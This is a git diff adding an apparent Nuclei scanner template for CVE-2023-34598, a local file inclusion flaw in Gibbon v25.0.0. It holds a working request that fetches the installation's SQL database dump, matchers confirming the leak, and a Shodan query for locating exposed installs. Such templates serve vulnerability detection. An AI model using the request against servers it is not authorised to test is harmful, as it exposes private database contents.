diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml new file mode 100644 index 0000000000..1961abf237 --- /dev/null +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-34598 + +info: + name: Gibbon v25.0.0 - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response. + reference: + - https://github.com/maddsec/CVE-2023-34598 + - https://nvd.nist.gov/vuln/detail/CVE-2023-34598 + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:-165631681 + tags: cve,cve2023,gibbon,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/?q=./gibbon.sql" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'phpMyAdmin SQL Dump' + - 'Database:' + - 'gibbon' + condition: and + + - type: status + status: + - 200